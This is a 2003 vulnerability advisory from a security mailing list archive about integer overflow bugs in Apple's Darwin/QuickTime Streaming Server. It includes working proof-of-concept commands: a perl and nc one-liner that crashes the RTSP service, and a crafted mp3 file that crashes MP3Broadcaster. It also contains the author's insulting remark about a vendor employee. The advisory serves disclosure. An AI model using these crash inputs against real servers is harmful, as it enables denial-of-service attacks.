lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <3ecd20c9.a0c8fba3@s-mail.com>
From: mordred at s-mail.com (Sir Mordred)
Subject: QuickTime/Darwin Streaming Server security issues

// @(#)Security advisory: QuickTime/Darwin Streaming server security issues

Release date: May 22, 2003
Name: QuickTime/Darwin Streaming server security issues
Author: Sir Mordred (mordred@...ail.com)

I. DESCRIPTION

Darwin Streaming Server (DSS) is server technology which allows
you to send streaming QuickTime data to clients across the Internet using
the industry standard RTP and RTSP protocols.
It is based on the same code as Apple's QuickTime Streaming Server.
Please visit http://developer.apple.com/darwin/projects/streaming/ for more
information about DSS.

II. DETAILS

* ISSUE 1 - Integer overflow in QTSSReflector module

Integer overflow exists in ANNOUNCE request parsing routine:

$ perl -e 'print "ANNOUNCE /.sdp RTSP/1.0\nContent-length:4294967295\n\n",
"A"x8192' | nc -v localhost 554
localhost [127.0.0.1] 554 (rtsp) open
too many output retries : Broken pipe

* ISSUE 2 - Integer handling vulnerability in MP3Broadcaster utility

MP3Broadcaster utility which is shipped with DSS, suffers from integer
handling vulnerability in ID3 tags parsing routines.
Below are the steps how to reproduce the issue:

First create the sample configuration file:
$ echo -e "\n" > test.conf

Then create a playlist file:
$ echo -e "*PLAY-LIST*\nsong.mp3" > mp3playlist.ply

Create a specially crafted mp3 file:
$ echo -e
"ID3\x03\x00\x00\x00\x00\x0f\x0fTPE1\xff\xaa\xaa\xbb\x00\x00\x00\x00\x00\x00

" > song.mp3

Now, when the user tries to check his mp3 files (-X option):
$ MP3Broadcaster -X -l mp3playlist.ply -c test.conf

Configuration Settings
--------------------------
...
play_mode  sequential
playlist_file  mp3playlist.ply
...

There is one movie in the Playlist.

Segmentation fault (core dumped)

III. VERSIONS TESTED

Linux RedHat 7.2 with DSS 4.1.3

$ echo -ne "OPTIONS * RTSP/1.0\nCseq: 1\n\n" | nc localhost 554
RTSP/1.0 200 OK
Server: DSS/4.1.3 (Build/412.45; Platform/Linux)
Cseq: 1
Public: DESCRIBE, SETUP, TEARDOWN, PLAY, PAUSE, ANNOUNCE,
SET_PARAMETER,RECORD

IV. VENDOR STATUS

The emails have been sent to product-security@...le.com,
streaming-server-developers@...ts.apple.com and after a bit of waiting got
rather interesting answer from Joel Hedden <jhedden@...le.com>:

<quote>
Please correct us if this is wrong:
1.  The bugs are only DoS attacks and cannot be used to breach security of
the host machine, run arbitrary code, etc.
2.  Neither bug is remotely exploitable unless the administrator has
enabled
unauthenticated remote broadcasts (which is not likely).
</quote>

I think both of the "bugs" can be used to "breach security of the host
machine, run arbitrary code, etc"...
After receiving response from Apple just decided to publish the advisory a
bit earlier then i planned.

V. CREDITS

Credits go to:

Sir Mordred <mordred@...ail.com> who discovered the issues.
Joel Hedden <jhedden@...le.com> who is dumb enough not to understand them.




________________________________________________________________________
This letter has been delivered unencrypted. We'd like to remind you that
the full protection of e-mail correspondence is provided by S-mail
encryption mechanisms if only both, Sender and Recipient use S-mail.
Register at S-mail.com: http://www.s-mail.com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ